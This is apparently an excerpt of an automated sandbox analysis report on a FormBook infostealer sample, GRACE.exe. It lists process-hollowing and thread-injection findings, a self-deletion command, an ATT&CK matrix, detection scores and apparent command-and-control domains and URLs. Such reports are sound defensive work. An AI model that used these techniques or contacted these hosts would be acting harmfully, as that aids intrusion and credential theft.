          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03723B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037B131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03724BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03724BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03724BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03722397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037B138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037AD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03701B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03701B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037BEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03784257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03734A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03734A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03713A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03708A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03722AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03722ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0370AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0370AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03714120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03714120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03714120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03714120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03714120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03722990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037B2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03710050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03710050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0370B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0370B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0370B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0370B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03777016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03777016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03777016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\GRACE.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\GRACE.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 216.250.110.35 80
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\GRACE.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\GRACE.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 16B0000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\GRACE.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\Desktop\GRACE.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\GRACE.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: AD2008
          Source: C:\Users\user\Desktop\GRACE.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: explorer.exe, 00000010.00000000.296358359.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\GRACE.exeQueries volume information: C:\Users\user\Desktop\GRACE.exe VolumeInformation
          Source: C:\Users\user\Desktop\GRACE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\GRACE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\GRACE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Uses netsh to modify the Windows network and firewall settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Shared Modules1Valid Accounts1Valid Accounts1Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Masquerading1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection812Valid Accounts1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion3LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDisable or Modify Tools11Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection812DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDeobfuscate/Decode Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Obfuscated Files or Information3Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronSoftware Packing1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344817 Sample: GRACE.exe Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 33 www.sterlworldshop.com 2->33 35 www.11sxsx.com 2->35 37 5 other IPs or domains 2->37 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 4 other signatures 2->51 11 GRACE.exe 15 4 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 11->29 dropped 31 C:\Users\user\AppData\Local\...behaviorgraphRACE.exe.log, ASCII 11->31 dropped 61 Writes to foreign memory regions 11->61 63 Allocates memory in foreign processes 11->63 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->65 67 Injects a PE file into a foreign processes 11->67 15 AddInProcess32.exe 11->15         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 75 2 other signatures 15->75 18 explorer.exe 15->18 injected process9 dnsIp10 39 www.dl888.net 216.250.110.35, 49739, 80 DXTL-HKDXTLTseungKwanOServiceHK Hong Kong 18->39 41 www.ludisenofloral.com 18->41 43 3 other IPs or domains 18->43 53 System process connects to network (likely due to code injection or exploit) 18->53 22 netsh.exe 18->22         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          GRACE.exe62%VirustotalBrowse
          GRACE.exe16%MetadefenderBrowse
          GRACE.exe43%ReversingLabsByteCode-MSIL.Trojan.Wacatac
          GRACE.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.AddInProcess32.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.luxusgrotte.com0%VirustotalBrowse
          www.dl888.net4%VirustotalBrowse
          shops.myshopify.com0%VirustotalBrowse
          www.internetmarkaching.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.quintred.com/jqc/www.kimberlygoedhart.net0%Avira URL Cloudsafe
          http://www.dl888.net/jqc/www.hongreng.xyz0%Avira URL Cloudsafe
          http://www.kornteengoods.com/jqc/0%Avira URL Cloudsafe
          http://www.11sxsx.com/jqc/0%Avira URL Cloudsafe
          http://www.ludisenofloral.com/jqc/www.11sxsx.com0%Avira URL Cloudsafe
          http://www.quintred.comReferer:0%Avira URL Cloudsafe
          http://www.kimberlygoedhart.net/jqc/0%Avira URL Cloudsafe
          http://www.hongreng.xyz/jqc/www.hotvidzhub.download0%Avira URL Cloudsafe
          http://www.sterlworldshop.comReferer:0%Avira URL Cloudsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://www.novergi.com0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.szyulics.com/jqc/0%Avira URL Cloudsafe
          http://www.internetmarkaching.comReferer:0%Avira URL Cloudsafe
          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
          http://www.hongreng.xyz/jqc/0%Avira URL Cloudsafe
          http://www.luxusgrotte.com0%Avira URL Cloudsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://www.ludisenofloral.com0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
